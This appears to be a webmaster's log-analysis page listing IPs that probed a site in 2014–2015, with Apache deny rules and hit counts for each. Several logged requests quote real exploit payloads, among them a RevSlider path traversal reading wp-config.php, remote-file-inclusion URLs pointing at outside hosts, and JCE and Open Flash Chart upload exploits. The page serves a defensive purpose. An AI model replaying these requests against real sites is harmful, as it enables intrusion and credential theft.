You can actually use the counter of probes as the based for the number of days the pset should be denied too. So if somebody probed you 500 times, he should be gone for 100  days (if you use multiplier 0.1).

But that methods increases the size of active deny list, so fixed number of days like 90 has some advantages.

Again it is really important to weed out those who stopped their activity at the end of their TTL to keep your deny section manageable.


Top Visited
Switchboard
Latest
Past week
Past month

NEWS CONTENTS

Old News ;-)

[Apr 03, 2015] Elimination of script kiddies in April

Total records read in: 586767
# 82.98.160.235 (d393.dinaserver.com) produced 1600 page hits. Of them none were successful and 1600 were  probes
deny from 82.98.160.235

         /About/Stats/zombies_with_php_scanners.shtml//download.php : 200 hits
         php=1600
         POST=800
         shtml/=400
         HTTP Codes
                 404=1600


# 213.165.70.246 (s15398533.onlinehome-server.info) produced 800 page hits. Of them none were successful and 800 were  probes
deny from 213.165.70.246

         //download.php : 400 hits
         php=800
         POST=400
         HTTP Codes
                 404=800

# 112.175.88.159 () produced 600 page hits. Of them none were successful and 600 were  probes
deny from 112.175.88.159

         //download.php : 300 hits
         php=600
         POST=300
         HTTP Codes
                 404=600


# 41.193.5.54 (vdp-linux-01.hc8.voxcore.co.za) produced 259 page hits. Of them 8 were successful and 251 were  probes
deny from 41.193.5.54

         //download.php : 121 hits
         php=258
         POST=127
         shtml/=10
         HTTP Codes
                 403=19
                 404=232


# 5.196.81.92 (ns347440.ip-5-196-81.eu) produced 192 page hits. Of them none were successful and 192 were  probes
deny from 5.196.81.92

         /components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp : 4 hits
         php=192
         HTTP Codes
                 403=192


# 77.87.194.82 (ef1019.mirohost.net) produced 144 page hits. Of them none were successful and 144 were  probes
deny from 77.87.194.82

         /Office/Frontpage/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp : 3 hits
         php=144
         HTTP Codes
                 403=144


# 216.99.158.78 (unassigned.psychz.net) produced 79 page hits. Of them 15 were successful and 64 were  probes
deny from 216.99.158.78

         /editor/editor : 5 hits
         php=19
         HTTP Codes
                 403=64

# 148.251.65.63 (server117.cloudserverinc.com) produced 69 page hits. Of them 6 were successful and 63 were  probes
deny from 148.251.65.63

         /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b : 6 hits
         php=64
         POST=52
         shtml/=15
         HTTP Codes
                 403=9
                 500=52
                 404=2

# 27.159.231.126 (126.231.159.27.broad.xm.fj.dynamic.163data.com.cn) produced 214 page hits. Of them 157 were successful and 57 were  probes
deny from 27.159.231.126

         / : 76 hits
         php=79
         HTTP Codes
                 403=47
                 404=10
 

# 212.227.92.208 (cpanel1.hostingxpress.co.uk) produced 54 page hits. Of them none were successful and 54 were  probes
deny from 212.227.92.208

         /components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp : 1 hits
         php=54
         POST=2
         HTTP Codes
                 403=52
                 500=2
 

# 70.32.104.50 (dv-828broadcasting.com) produced 52 page hits. Of them none were successful and 52 were  probes
deny from 70.32.104.50

         //admin/categories.php/login.php?cPath=&action=' : 17 hits
         php=52
         shtml/=22
         HTTP Codes
                 403=52
 

# 37.59.97.250 (250.ip-37-59-97.eu) produced 48 page hits. Of them none were successful and 48 were  probes
deny from 37.59.97.250

         /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b : 16 hits
         php=48
         POST=16
         HTTP Codes
                 403=48

# 183.138.129.38 () produced 129 page hits. Of them 86 were successful and 43 were  probes
deny from 183.138.129.38

         /editor/editor/filemanager/connectors/asp/connector.asp : 7 hits
         php=42
         HTTP Codes
                 404=43
# 221.175.212.139 () produced 70 page hits. Of them 34 were successful and 36 were  probes
deny from 221.175.212.139

         /malware/ : 10 hits
         php=18
         HTTP Codes
                 403=16
                 404=20

# 121.205.214.75 (75.214.205.121.broad.pt.fj.dynamic.163data.com.cn) produced 57 page hits. Of them 23 were successful and 34 were  probes
deny from 121.205.214.75

         /skeptics/ : 20 hits
         php=24
         HTTP Codes
                 403=14
                 404=20

# 37.59.213.11 (sokapublic.soka-bouddhisme.fr) produced 30 page hits. Of them none were successful and 30 were  probes
deny from 37.59.213.11

         /error.php?dir=http://sklep.altus.pl/images/options/mad01.jpg?? : 5 hits
         php=30
         shtml/=10
         HTTP Codes
                 403=30

# 5.9.136.67 (srv01.sayber.com) produced 62 page hits. Of them 36 were successful and 26 were  probes
deny from 5.9.136.67

         /wp-admin/admin-ajax.php : 9 hits
         php=42
         POST=20
         HTTP Codes
                 403=6
                 500=8
                 404=12

# 87.98.252.196 () produced 24 page hits. Of them none were successful and 24 were  probes
deny from 87.98.252.196

         //wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php : 4 hits
         php=24
         HTTP Codes
                 403=24

# 207.58.138.170 (vps.twodogrc.com) produced 44 page hits. Of them 22 were successful and 22 were  probes
deny from 207.58.138.170

         //dompdf.php : 16 hits
         php=44
         POST=22
         HTTP Codes
                 403=22

# 31.210.107.71 (31-210-107-71.turkrdns.com) produced 21 page hits. Of them none were successful and 21 were  probes
deny from 31.210.107.71

         /administrator/index.php : 3 hits
         php=15
         HTTP Codes
                 400=21

# 79.133.217.242 () produced 44 page hits. Of them 24 were successful and 20 were  probes
deny from 79.133.217.242

         /index.php?/member/register/ : 20 hits
         php=20
         HTTP Codes
                 403=20

# 107.167.185.33 (33.185.167.107.bc.googleusercontent.com) produced 20 page hits. Of them none were successful and 20 were  probes
deny from 107.167.185.33

         /WWW/HTTP_log_analysis/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b : 4 hits
         php=20
         POST=16
         HTTP Codes
                 403=4
                 500=16

# 61.160.247.138 () produced 49 page hits. Of them 30 were successful and 19 were  probes
deny from 61.160.247.138

         /password/fckeditor/editor/ : 3 hits
         php=4
         POST=4
         HTTP Codes
                 403=14
                 404=5

# 72.27.230.135 (platone.agrelliebasta.it) produced 18 page hits. Of them none were successful and 18 were  probes
deny from 72.27.230.135

         /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 : 3 hits
         php=18
         POST=12
         HTTP Codes
                 403=6
                 500=12
*** c.resolvers.level3.net can't find 192.99.111.131: Non-existent domain

# 192.99.111.131 () produced 17 page hits. Of them none were successful and 17 were  probes
deny from 192.99.111.131

         /wp-login.php : 3 hits
         php=12
         HTTP Codes
                 400=17
*** c.resolvers.level3.net can't find 221.10.102.203: Non-existent domain

# 221.10.102.203 () produced 16 page hits. Of them none were successful and 16 were  probes
deny from 221.10.102.203

         http://softpanorama.org/ : 3 hits
         shtml/=1
         HTTP Codes
                 400=16

# 66.249.91.25 (rate-limited-proxy-66-249-91-25.google.com) produced 114 page hits. Of them 99 were successful and 15 were  probes
deny from 66.249.91.25

         /index.shtml : 7 hits
         shtml/=1
         HTTP Codes
                 403=1
                 404=14

# 104.250.138.220 (104-250-138-220.static.gorillaservers.com) produced 45 page hits. Of them 31 were successful and 14 were  probes
deny from 104.250.138.220

         /Tools/ : 15 hits
         php=17
         HTTP Codes
                 403=13
                 404=1

# 176.219.145.162 () produced 14 page hits. Of them none were successful and 14 were  probes
deny from 176.219.145.162

         /administrator/index.php : 2 hits
         php=10
         HTTP Codes
                 400=14

# 183.207.224.51 (cache.IDC.js.chinamobile.com) produced 34 page hits. Of them 21 were successful and 13 were  probes
deny from 183.207.224.51

         / : 6 hits
         php=6
         HTTP Codes
                 500=6
                 400=1
                 404=6

# 188.165.193.89 (ns309487.ovh.net) produced 31 page hits. Of them 19 were successful and 12 were  probes
deny from 188.165.193.89

         /WWW/lowcase.shtml : 8 hits
         php=23
         HTTP Codes
                 404=12

# 188.40.153.39 (server.webvizarts.com) produced 29 page hits. Of them 17 were successful and 12 were  probes
deny from 188.40.153.39

         /Social/overload.shtml : 5 hits
         php=4
         shtml/=4
         HTTP Codes
                 404=12

# 86.39.163.58 (86.39.163.58.static.hosted.by.easyhost.be) produced 12 page hits. Of them none were successful and 12 were  probes
deny from 86.39.163.58

         /viewticket.php : 4 hits
         php=12
         POST=12
         HTTP Codes
                 500=12

# 168.144.82.36 (diamond.etimeeasy.com) produced 12 page hits. Of them none were successful and 12 were  probes
deny from 168.144.82.36

         /WWW/HTTP_log_analysis/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 : 2 hits
         php=12
         POST=8
         HTTP Codes
                 403=4
                 500=8

# 185.42.65.219 (server.07heavendesign.co.uk) produced 91 page hits. Of them 79 were successful and 12 were  probes
deny from 185.42.65.219

         /Images/nosuchfile.png : 26 hits
         php=24
         shtml/=2
         HTTP Codes
                 404=12

# 213.147.64.20 (venus2.nbnet.co.ke) produced 12 page hits. Of them none were successful and 12 were  probes
deny from 213.147.64.20

         /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b : 6 hits
         php=6
         POST=6
         HTTP Codes
                 500=12


# 66.84.26.98 (server7.webelementinc.com) produced 10 page hits. Of them none were successful and 10 were  probes
deny from 66.84.26.98

         /WWW/HTTP_log_analysis/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b : 2 hits
         php=10
         POST=8
         HTTP Codes
                 403=2
                 500=8

# 80.65.96.107 (web7.introweb.nl) produced 10 page hits. Of them none were successful and 10 were  probes
deny from 80.65.96.107

         /History//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php : 1 hits
         php=10
         HTTP Codes
                 403=10

# 46.235.10.40 (46.235.10.40.static.teknikdata.com) produced 10 page hits. Of them none were successful and 10 were  probes
deny from 46.235.10.40

         /WWW/HTTP_log_analysis/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b : 2 hits
         php=10
         POST=8
         HTTP Codes
                 403=2
                 500=8

# 92.63.88.111 (ip88-111.mwtv.lv) produced 16 page hits. Of them 6 were successful and 10 were  probes
deny from 92.63.88.111

         /WWW/lowcase.shtml : 3 hits
         php=12
         HTTP Codes
                 404=10
# 104.199.143.211 () produced 10 page hits. Of them none were successful and 10 were  probes
deny from 104.199.143.211

         /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 : 2 hits
         php=10
         POST=8
         HTTP Codes
                 403=2
                 500=8

[Mar 14, 2015] Elimination of script kiddies in March

Total records read in: 1153450

# 80.242.123.135 (135-123-242-80.pppoe.dyn.broadband.blic.net) produced 502 page hits. Of them 118 were successful and 384 were probes
deny from 80.242.123.135

/WWW/Webservers/Apache/htaccess.shtml : 22 hits
php=384
HTTP Codes
403=384
*** c.resolvers.level3.net can't find 104.42.64.31: Non-existent domain

# 104.42.64.31 () produced 354 page hits. Of them none were successful and 354 were PHP probes
deny from 104.42.64.31

//admin/categories.php/login.php?cPath=&action=new_product_preview : 115 hits
php=354
shtml/=15
HTTP Codes
500=354
*** c.resolvers.level3.net can't find 104.43.11.7: Non-existent domain

# 104.43.11.7 () produced 340 page hits. Of them none were successful and 340 were probes
deny from 104.43.11.7

//admin/categories.php/login.php?cPath=&action=new_product_preview : 113 hits
php=340
shtml/=10
HTTP Codes
500=340


# 104.40.226.28 () produced 329 page hits. Of them none were successful and 329 were probes
deny from 104.40.226.28

//admin/categories.php/login.php?cPath=&action=new_product_preview : 108 hits
php=329
shtml/=14
HTTP Codes
500=329

# 104.154.67.112 (112.67.154.104.bc.googleusercontent.com) produced 324 page hits. Of them none were successful and 324 were probes
deny from 104.154.67.112

//admin/categories.php/login.php?cPath=&action=new_product_preview : 107 hits
php=324
shtml/=27
HTTP Codes
500=324
*** c.resolvers.level3.net can't find 104.210.0.25: Non-existent domain

# 104.210.0.25 () produced 318 page hits. Of them none were successful and 318 were probes
deny from 104.210.0.25

//admin/categories.php/login.php?cPath=&action=new_product_preview : 105 hits
php=318
shtml/=10
HTTP Codes
500=318

# 104.155.44.126 (126.44.155.104.bc.googleusercontent.com) produced 317 page hits. Of them none were successful and 317 were probes
deny from 104.155.44.126

//admin/categories.php/login.php?cPath=&action=new_product_preview : 103 hits
php=317
shtml/=17
HTTP Codes
500=317

# 212.129.10.181 (212-129-10-181.rev.poneytelecom.eu) produced 630 page hits. Of them 318 were successful and 312 were probes -- already in abusers list
deny from 212.129.10.181

/../../CSS/main.css : 304 hits
php=3
HTTP Codes
400=306
404=6

# 146.148.5.207 (207.5.148.146.bc.googleusercontent.com) produced 312 page hits. Of them none were successful and 312 were probes
deny from 146.148.5.207

//admin/categories.php/login.php?cPath=&action=new_product_preview : 102 hits
php=312
shtml/=13
HTTP Codes
500=312

# 146.148.94.228 (228.94.148.146.bc.googleusercontent.com) produced 310 page hits. Of them none were successful and 310 were probes
deny from 146.148.94.228

//admin/categories.php/login.php?cPath=&action=new_product_preview : 103 hits
php=310
shtml/=18
HTTP Codes
500=310
*** c.resolvers.level3.net can't find 46.229.164.99: Non-existent domain

# 146.148.12.120 (120.12.148.146.bc.googleusercontent.com) produced 305 page hits. Of them none were successful and 305 were probes
deny from 146.148.12.120

//admin/categories.php/login.php?cPath=&action=new_product_preview : 101 hits
php=305
shtml/=17
HTTP Codes
500=305
*** c.resolvers.level3.net can't find 46.229.164.114: Non-existent domain

# 191.233.32.225 () produced 298 page hits. Of them none were successful and 298 were probes
deny from 191.233.32.225

//admin/categories.php/login.php?cPath=&action=new_product_preview : 99 hits
php=298
shtml/=11
HTTP Codes
500=298

# 104.155.194.222 (222.194.155.104.bc.googleusercontent.com) produced 297 page hits. Of them none were successful and 297 were probes
deny from 104.155.194.222

//admin/categories.php/login.php?cPath=&action=new_product_preview : 96 hits
php=297
shtml/=19
HTTP Codes
500=297


# 104.154.91.135 (135.91.154.104.bc.googleusercontent.com) produced 291 page hits. Of them none were successful and 291 were probes
deny from 104.154.91.135

//admin/categories.php/login.php?cPath=&action=new_product_preview : 96 hits
php=291
shtml/=13
HTTP Codes
500=291

# 37.59.97.250 (250.ip-37-59-97.eu) produced 288 page hits. Of them none were successful and 288 were probes
deny from 37.59.97.250

/Office/Frontpage/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=magic.php.pHp : 6 hits
php=288
HTTP Codes
403=288

# 104.155.206.121 (121.206.155.104.bc.googleusercontent.com) produced 279 page hits. Of them none were successful and 279 were probes
deny from 104.155.206.121

//admin/categories.php/login.php?cPath=&action=new_product_preview : 92 hits
php=279
shtml/=10
HTTP Codes
500=279

# 107.167.187.42 (42.187.167.107.bc.googleusercontent.com) produced 264 page hits. Of them none were successful and 264 were probes
deny from 107.167.187.42

//admin/categories.php/login.php?cPath=&action=new_product_preview : 87 hits
php=264
shtml/=18
HTTP Codes
500=264


# 195.211.102.88 () produced 230 page hits. Of them none were successful and 230 were probes
deny from 195.211.102.88

//skin/salz_gallery/ask_password.php?dir=http://www.asefmed.com/wp-includes/css/main.css??? : 2 hits
php=230
HTTP Codes
403=230
*** c.resolvers.level3.net can't find 46.229.164.113: Non-existent domain


# 8.29.140.244 (8-29-140-244.bhsrv.net) produced 244 page hits. Of them 24 were successful and 220 were probes
deny from 8.29.140.244

//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php : 23 hits
php=231
POST=16
HTTP Codes
403=204
500=16

# 195.182.228.184 (hotelgardalakeview.com) produced 216 page hits. Of them none were successful and 216 were probes
deny from 195.182.228.184

/library/openflashchart/php-ofc-library/ofc_upload_image.php?name=joss.php : 8 hits
php=216
shtml/=72
HTTP Codes
403=216

# 94.23.51.159 (ns3495138.ip-94-23-51.eu) produced 208 page hits. Of them none were successful and 208 were probes
deny from 94.23.51.159

/WWW/Webservers/Apache/Modules/Mod_rewrite/wp-content/plugins/seo-watcher/ofc/tmp-upload-images/vito.php?rf : 4 hits
php=208
POST=104
HTTP Codes
403=104
500=104

# 68.115.58.114 (68-115-58-114.static.eucl.wi.charter.com) produced 195 page hits. Of them 3 were successful and 192 were probes
deny from 68.115.58.114

/modules/mod_raxo_allmode/tools/tb.php?src=http://picasa.com.perupaja.com/pagat.php : 30 hits
php=190
POST=47
shtml/=12
HTTP Codes
403=143
500=47
404=2


# 211.47.181.38 () produced 376 page hits. Of them 188 were successful and 188 were probes
deny from 211.47.181.38

////bbs/skin/happycast_category_bluishgreen/write.php : 120 hits
php=376
POST=188
HTTP Codes
403=188

# 162.248.243.2 (biz.giftsthink.com) produced 183 page hits. Of them none were successful and 183 were probes
deny from 162.248.243.2

//admin/categories.php/login.php?cPath=&action=new_product_preview : 61 hits
php=183
shtml/=32
HTTP Codes
500=183
Skipped known robot 153.107.97.166 msnbot-207-46-13-120.search.msn.com
*** c.resolvers.level3.net can't find 46.229.164.115: Non-existent domain

# 64.132.169.186 (64-132-169-186.static.twtelecom.net) produced 165 page hits. Of them none were successful and 165 were probes
deny from 64.132.169.186

/Office/Frontpage/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b : 20 hits
php=162
POST=95
shtml/=14
HTTP Codes
403=70
500=95


# 188.40.53.185 (static.185.53.40.188.clients.your-server.de) produced 155 page hits. Of them none were successful and 155 were probes
deny from 188.40.53.185

/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b : 14 hits
php=124
POST=124
shtml/=10
HTTP Codes
403=31
500=124
*** c.resolvers.level3.net can't find 198.50.192.33: Non-existent domain

# 198.50.192.33 () produced 148 page hits. Of them none were successful and 148 were probes
deny from 198.50.192.33

//wp-content/themes/Minblr/themify/themify-ajax.php?upload=1 : 1 hits
php=74
POST=74
HTTP Codes
403=74
404=74

# 188.121.41.44 (n1nlhg039.shr.prod.ams1.secureserver.net) produced 216 page hits. Of them 72 were successful and 144 were probes
deny from 188.121.41.44

/WWW/web_logs_analysis.shtml : 24 hits
php=144
shtml/=48
HTTP Codes
403=144

# 195.200.78.252 (mutu-78-252.i-online.fr) produced 146 page hits. Of them 9 were successful and 137 were probes
deny from 195.200.78.252

/WWW/HTTP_log_analysis/php_probes.shtml : 4 hits
php=135
shtml/=29
HTTP Codes
403=137


# 54.254.207.180 (ec2-54-254-207-180.ap-southeast-1.compute.amazonaws.com) produced 136 page hits. Of them 5 were successful and 131 were probes
deny from 54.254.207.180

/admin/categories.php/login.php?cPath=&action=new_product_preview : 30 hits
php=133
POST=102
shtml/=27
HTTP Codes
403=117
500=12
404=2

# 104.155.26.92 (92.26.155.104.bc.googleusercontent.com) produced 131 page hits. Of them none were successful and 131 were probes
deny from 104.155.26.92

//admin/categories.php/login.php?cPath=&action=new_product_preview : 43 hits
php=131
shtml/=15
HTTP Codes
500=131

# 104.154.83.26 (26.83.154.104.bc.googleusercontent.com) produced 129 page hits. Of them none were successful and 129 were probes
deny from 104.154.83.26

//admin/categories.php/login.php?cPath=&action=new_product_preview : 43 hits
php=129
shtml/=14
HTTP Codes
500=129

# 146.148.119.112 (112.119.148.146.bc.googleusercontent.com) produced 126 page hits. Of them none were successful and 126 were probes
deny from 146.148.119.112

//admin/categories.php/login.php?cPath=&action=new_product_preview : 42 hits
php=126
shtml/=13
HTTP Codes
500=126

# 104.155.223.158 (158.223.155.104.bc.googleusercontent.com) produced 126 page hits. Of them none were successful and 126 were probes
deny from 104.155.223.158

//admin/categories.php/login.php?cPath=&action=new_product_preview : 42 hits
php=126
shtml/=13
HTTP Codes
500=126
*** c.resolvers.level3.net can't find 23.97.192.37: Non-existent domain

# 23.97.192.37 () produced 123 page hits. Of them none were successful and 123 were probes
deny from 23.97.192.37

//admin/categories.php/login.php?cPath=&action=new_product_preview : 41 hits
php=123
shtml/=11
HTTP Codes
500=123

# 104.154.89.107 (107.89.154.104.bc.googleusercontent.com) produced 122 page hits. Of them none were successful and 122 were probes
deny from 104.154.89.107

//admin/categories.php/login.php?cPath=&action=new_product_preview : 40 hits
php=122
shtml/=11
HTTP Codes
500=122
Skipped known robot 153.107.97.166 msnbot-207-46-13-86.search.msn.com

# 198.13.103.138 (unassigned.psychz.net) produced 136 page hits. Of them 17 were successful and 119 were probes
deny from 198.13.103.138

/fckeditor//editor/filemanager/connectors/aspx/connector.aspx?Command=GetFolders&Type=File&CurrentFolder=%2F : 7 hits
php=34
HTTP Codes
403=119


# 104.155.7.117 (117.7.155.104.bc.googleusercontent.com) produced 117 page hits. Of them none were successful and 117 were probes
deny from 104.155.7.117

//admin/categories.php/login.php?cPath=&action=new_product_preview : 39 hits
php=117
shtml/=13
HTTP Codes
500=117
*** c.resolvers.level3.net can't find 23.97.48.248: Non-existent domain

# 23.97.48.248 () produced 116 page hits. Of them none were successful and 116 were probes
deny from 23.97.48.248

//admin/categories.php/login.php?cPath=&action=new_product_preview : 38 hits
php=116
shtml/=13
HTTP Codes
500=116

# 146.148.80.254 (254.80.148.146.bc.googleusercontent.com) produced 114 page hits. Of them none were successful and 114 were probes
deny from 146.148.80.254

//admin/categories.php/login.php?cPath=&action=new_product_preview : 38 hits
php=114
shtml/=12
HTTP Codes
500=114
*** c.resolvers.level3.net can't find 191.238.84.112: Non-existent domain

# 191.238.84.112 () produced 113 page hits. Of them none were successful and 113 were probes
deny from 191.238.84.112

//admin/categories.php/login.php?cPath=&action=new_product_preview : 38 hits
php=113
shtml/=13
HTTP Codes
500=113
*** c.resolvers.level3.net can't find 112.218.68.155: Non-existent domain

# 112.218.68.155 () produced 205 page hits. Of them 93 were successful and 112 were probes
deny from 112.218.68.155

////bbs/skin/happycast_category_bluishgreen/write.php : 83 hits
php=199
POST=87
HTTP Codes
403=112
Skipped known robot 153.107.97.166 crawl-66-249-73-214.googlebot.com

# 104.155.225.251 (251.225.155.104.bc.googleusercontent.com) produced 108 page hits. Of them none were successful and 108 were probes
deny from 104.155.225.251

//admin/categories.php/login.php?cPath=&action=new_product_preview : 36 hits
php=108
shtml/=14
HTTP Codes
500=108
Skipped known robot 153.107.97.166 crawl-66-249-73-222.googlebot.com

# 104.155.233.141 (141.233.155.104.bc.googleusercontent.com) produced 100 page hits. Of them none were successful and 100 were probes
deny from 104.155.233.141

/WWW/HTTP_log_analysis/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b : 20 hits
php=100
POST=80
HTTP Codes
403=20
500=80

# 212.98.164.233 (myweb08.bn.by) produced 100 page hits. Of them none were successful and 100 were probes
deny from 212.98.164.233

/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 : 20 hits
php=100
POST=80
HTTP Codes
403=20
500=80

[Jan 26, 2015] Most active script kiddies

520 203.130.206.204 Unresolved
511 176.31.252.38 ns387958.ip-176-31-252.eu
457 50.28.14.54 proton.sabren.com
301 37.187.250.73 ns340593.ip-37-187-250.eu
288 46.4.116.200 static.200.116.4.46.clients.your-server.de
288 194.146.200.68 mail.logic-bratsk.ru
275 191.238.83.120 Unresolved
273 5.39.74.132 ns2289998.ovh.net
263 191.233.40.18 Unresolved
257 191.233.33.100 Unresolved
255 191.233.33.245 Unresolved
240 82.127.156.19 LNantes-156-76-5-19.w82-127.abo.wanadoo.fr
238 58.22.156.231 Unresolved
236 94.23.98.251 serveur02.ffbad.org
229 103.2.237.233 ht002.joister.com
216 81.176.228.2 l19.in-solve.ru
210 37.187.55.146 146.ip-37-187-55.eu
207 37.187.147.6 ns321378.ip-37-187-147.eu
205 174.136.14.201 panel.fridaydesign.com
204 195.184.9.93 mail.telekol.hu
203 94.75.249.46 vps1.webing.nl
200 87.117.203.32 Unresolved
198 91.121.89.97 mutu1.cvc-it.com
163 85.214.195.39 h1910509.stratoserver.net
158 175.42.44.63 Unresolved
144 81.88.49.13 opus12.register.it
144 213.13.156.22 sv01.alojamento-portugal.com
144 185.19.184.134 durga.thirdeye.it
144 178.136.234.155 Unresolved
138 190.210.189.229 customer-static-210-189-229.iplannetworks.net

[Jun 09, 2014] Example of blind probe for asu.php

fgrep 213.251.187.189 get140608
213.251.187.189 - - [30/Apr/2014:15:51:49 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:15:51:52 +0000] "GET /WWW/Webservers/Apache/Modules/Mod_rewrite/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:16:04:01 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:16:04:06 +0000] "GET /WWW/Webservers/Apache/Modules/Mod_rewrite/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:16:24:38 +0000] "GET /WWW/Webservers/Apache/Modules/Mod_rewrite/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:16:24:39 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:16:25:07 +0000] "GET /WWW/Webservers/Apache/Modules/Mod_rewrite/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:16:25:09 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:17:11:03 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:17:11:03 +0000] "GET /WWW/Webservers/Apache/Modules/Mod_rewrite/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:17:11:25 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [30/Apr/2014:17:11:37 +0000] "GET /WWW/Webservers/Apache/Modules/Mod_rewrite/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:04:56 +0000] "GET /Office/Frontpage/Reference/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:04:56 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:05:01 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:05:01 +0000] "GET /Office/Frontpage/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:06:16 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:06:18 +0000] "GET /Office/Frontpage/images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.251.187.189 - - [01/May/2014:08:06:19 +0000] "GET /images/stories/asu.php?rf HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
